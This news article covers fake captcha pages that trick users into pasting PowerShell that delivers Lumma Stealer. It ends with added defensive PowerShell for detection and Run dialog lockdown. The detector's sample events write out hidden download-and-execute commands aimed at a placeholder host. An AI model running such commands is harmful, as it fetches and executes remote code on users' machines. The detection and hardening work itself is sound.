Several cybersecurity firms have published alerts about threat actors fooling customer employees into downloading malware through fake captcha login verification pages.
Captchas are the tests websites add to login routines to make sure users are real people and not automated bots. Making a user type in a distorted number shown in a popup, or click on the boxes that contain a specified picture, is meant to be something a bot can’t easily do.
But while defenders have been warned, threat actors continue to use fake captchas to spread malware, apparently because it’s still a successful tactic.
“I expect we’re going to continue to see this throughout the year,” Ray Canzanese, director of Netskope Threat Labs, said in an interview Thursday. The goal, his company said in a warning published last month, is to spread Lumma Stealer information-stealing malware.
“We have seen more of these fake captchas every single day,” he said. “There is not a weekday that goes by so far this year where we haven’t seen someone who ends up on one of these fake pages. We’re talking thousands of people in the month of January. I think we’re going to top thousands in February as well.”
As for why it’s still being used after CISOs have been alerted, Canzanese noted that threat actors don’t have to be successful every time with a tactic – just often enough to make it worthwhile.
Alex Caparo, a cyber threat intelligence analyst at ReliaQuest, said his firm put out a warning in December because of the volume of incidents seen by customers. “We started seeing them in early September of 2024. Between October and early December we saw almost a 2X increase in these attacks in our environment – and a doubling again of that number since then,” he said Thursday.
In fact, he said, one of his firm’s customers faced an attempt to use the fake captcha tactic earlier this week.
It doesn’t help, he added, that security researchers – some legitimate, some not – soon published templates on developer sites like GitHub that threat actors eagerly copied.
How the scam works
Typically, the recent captcha scams try to trick an employee into pasting a malicious script into their Windows PC and running it themselves.
It often starts with an employee getting an email or text from what looks like a trustworthy source asking them to go to a website related to their company’s business. For example, the message to a developer may say, ‘We have detected a security vulnerability in your repository,’ and asks the target to click on a supposed GitHub link.
However, an individual may also stumble across a compromised or attacker-controlled website after doing an internet search for an application update or instruction manual.
What happens next is the website throws up a box saying something like “Verify You Are Human.” But instead of asking the target to click on a series of photos or type in a number, the target is instructed to copy a [malicious] script or, in a more recent version of the scam, press the Windows key on their keyboard plus the letter R. That opens the Windows Run dialog. The page’s own code has already placed the script on the clipboard, so the target next has to press CTRL+V, which pastes the script into the Run dialog, and press Enter, which executes it.
A variation shows a window that pops up saying ‘Verification Failed.’ The user is told that, to solve the problem, they have to copy and execute a script or install a so-called root certificate.
Sometimes the verification page is labelled “CloudFlare,” in hopes of convincing the target of the legitimacy of what they’re being asked to do by using a trusted brand name.
Whatever the ruse, the pasted script is a malicious PowerShell command that contacts a command-and-control server, which eventually delivers Lumma Stealer or other malware to the user’s computer.
In short, the goal is to get the employee to download and run the malware themselves, rather than the attacker having to plant it.
“We have seen serious development [of the tactic] since September,” said Michal Salat, head of threat intelligence at Gen Digital, owner of the Norton, Avast, AVG and other cybersecurity brands. “Originally it started with simple scripts, [and] continued with many different tactics to make it look more legitimate. Because it was fairly successful infecting people, more attack groups started using these techniques. We not only saw more sophistication, but also saw the spread to other malware strains or distribution chains.”
Gen Digital blogged about this tactic last September.
The latest trick is to make the text to be pasted look less like computer code, which might look suspicious, and more like a verification sentence with a smiley emoji or a checkmark, to dupe the user into thinking they’re doing the right thing.
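The mechanics described above also define what a defender can look for: a script interpreter launched by explorer.exe (the process behind the Run dialog) with a command line that downloads and executes something, hides its window, or carries a captcha-themed comment. The following is an added example, not code from the article or from any of the firms quoted in it. It assumes process-creation events have already been collected and normalized to objects with ParentImage, Image and CommandLine fields (as Sysmon Event ID 1 provides); the three events, the indicator list, the function name and the host example.invalid are this example’s own constructions.

```powershell
# Added example (not from the article). Constructed process-creation events; example.invalid is a placeholder.
$events = @(
    # 1. Fake-captcha payload: hidden PowerShell, download-and-execute, captcha-themed trailing comment.
    [pscustomobject]@{
        ParentImage = 'C:\Windows\explorer.exe'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell -w hidden -ep bypass -c "iex (iwr ''https://example.invalid/v.txt'' -UseBasicParsing)" # I am not a robot - reCAPTCHA Verification ID: 7811'
    }
    # 2. Same payload hidden behind -EncodedCommand (base64 of the UTF-16LE script).
    [pscustomobject]@{
        ParentImage = 'C:\Windows\explorer.exe'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell -nop -w hidden -enc ' + [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes("iex (iwr 'https://example.invalid/v.txt')"))
    }
    # 3. Benign: a developer running a build script from an editor, not from the Run dialog.
    [pscustomobject]@{
        ParentImage = 'C:\Program Files\Microsoft VS Code\Code.exe'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell -NoProfile -File .\build.ps1'
    }
)

function Test-ClickFixEvent {
    param([Parameter(Mandatory)] $Event)

    # Whatever is typed into the Run dialog is launched by explorer.exe, so that parent is the pivot.
    # PowerShell is what the article describes; mshta and cmd are common variants (assumption).
    $fromRunDialog = (Split-Path -Leaf $Event.ParentImage) -ieq 'explorer.exe'
    $isLoader      = @('powershell.exe', 'pwsh.exe', 'mshta.exe', 'cmd.exe') -contains (Split-Path -Leaf $Event.Image)

    $cmd     = $Event.CommandLine
    $decoded = $null
    # -enc / -e / -ec carry a base64 UTF-16LE script; decode it so the checks below see the real command.
    if ($cmd -match '(?i)\s-e(nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})') {
        try { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2])) } catch { }
    }
    $text = if ($decoded) { "$cmd $decoded" } else { $cmd }

    $indicators = @()
    if ($decoded)                                                                                 { $indicators += 'encoded command' }
    if ($text -match '(?i)-(w|windowstyle)\s+h(idden)?')                                          { $indicators += 'hidden window' }
    if ($text -match '(?i)\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring|curl)\b') { $indicators += 'download-and-execute' }
    if ($text -match '(?i)https?://')                                                             { $indicators += 'remote URL' }
    if ($text -match '(?i)#.*(robot|captcha|verif|human)')                                        { $indicators += 'captcha-themed comment' }

    [pscustomobject]@{
        # Any loader started from explorer.exe with at least one indicator is flagged; tune the threshold to your fleet.
        Suspicious  = ($fromRunDialog -and $isLoader -and ($indicators.Count -gt 0))
        Indicators  = ($indicators -join ', ')
        Decoded     = $decoded
        CommandLine = $cmd
    }
}

$events | ForEach-Object { Test-ClickFixEvent $_ } | Format-List
```

Events 1 and 2 come back flagged (the second with its decoded script shown), the editor-launched build script does not. The parent-process pivot is what keeps the rule quiet on developer machines, where the same PowerShell flags appear legitimately; in production the indicator list would be tuned against a baseline of what is actually typed into Run in your environment.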
Advice for CISOs
Canzanese and Caparo offer the following advice to CISOs to mitigate the threat:
- Include warnings of this tactic in regular employee security awareness training. In some ways, the advice to staff is simple: Always refuse requests to paste commands into your computer. And remind employees to tell their families to look out for this kind of scam. Consumers will encounter it when hunting for cracked/hacked commercial software that they want to get for free, or while looking for YouTube tutorials.
- Monitor the use of PowerShell. In most organizations only a small number of employees should be allowed to access PowerShell.
- Windows administrators should restrict the use of the Windows Run command to only those who need it, says Caparo. Set up a group policy under User Configuration/Administrative Templates/Start Menu and Taskbar, and enable the option that says “Remove Run menu from Start Menu.”
“If you apply that policy on non-administrator and non-development machines, it should stop regular users from being able to run malware using this specific technique,” he said.
- Disable the ability of browsers on employee PCs to save passwords. ReliaQuest notes that this helps protect against infostealers that swallow up stored credentials.
- Enable phishing-resistant two-factor authentication, so that stolen passwords alone are not enough to log in.
- Use an endpoint detection and response (EDR) solution to detect malware and block malicious scripts.
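For the Run dialog advice above, the following is an added example in PowerShell, not code from the article, ReliaQuest or Microsoft. The “Remove Run menu from Start Menu” policy writes the DWORD value NoRun = 1 under Software\Microsoft\Windows\CurrentVersion\Policies\Explorer (HKCU for the user-scoped policy Caparo describes, HKLM for a machine-wide one); the script reports that value, can set it where Group Policy is not available, and lists the Run dialog’s own history from the RunMRU key, which is where an analyst can see what has actually been typed into Run on a machine. The function names are this example’s own; run it elevated when writing to HKLM.

```powershell
# Added example (not from the article): audit and enforce the registry value behind
# "Remove Run menu from Start Menu", and list the Run dialog history for review.

function Get-RunDialogPolicy {
    $paths = @(
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'
    )
    foreach ($p in $paths) {
        # Missing key or value means the policy is not applied at that scope.
        $value = (Get-ItemProperty -Path $p -Name NoRun -ErrorAction SilentlyContinue).NoRun
        $state = if ($value -eq 1) { 'blocked' } else { 'allowed' }
        [pscustomobject]@{
            Scope     = $p.Split(':')[0]
            RunDialog = $state
            RawValue  = $value
        }
    }
}

function Set-RunDialogBlocked {
    param([ValidateSet('HKCU', 'HKLM')][string]$Scope = 'HKCU')
    $p = "$($Scope):\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
    if (-not (Test-Path $p)) { New-Item -Path $p -Force | Out-Null }
    # Same value Group Policy writes; Explorer reads it at logon, so the user must sign out and in.
    New-ItemProperty -Path $p -Name NoRun -PropertyType DWord -Value 1 -Force | Out-Null
}

function Get-RunDialogHistory {
    # Explorer keeps what was typed into Run as single-letter values ("a", "b", ...) plus an MRUList order.
    $mru = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (-not (Test-Path $mru)) { return }
    $props = Get-ItemProperty -Path $mru
    foreach ($name in $props.PSObject.Properties.Name) {
        if ($name -match '^[a-z]$') {
            # Each stored entry ends in "\1"; strip it for readability.
            [pscustomobject]@{ Slot = $name; Command = ($props.$name -replace '\\1$', '') }
        }
    }
}

Get-RunDialogPolicy  | Format-Table -AutoSize
Get-RunDialogHistory | Format-Table -AutoSize -Wrap
# To enforce for the current user where Group Policy is not in use:
# Set-RunDialogBlocked -Scope HKCU
```

On a machine where the policy is already applied, RunMRU is normally absent or stale; on one where it is not, any history entry that is more than a plain program name (a powershell or mshta command with a URL, for instance) is worth pulling into the detection work described earlier in the article.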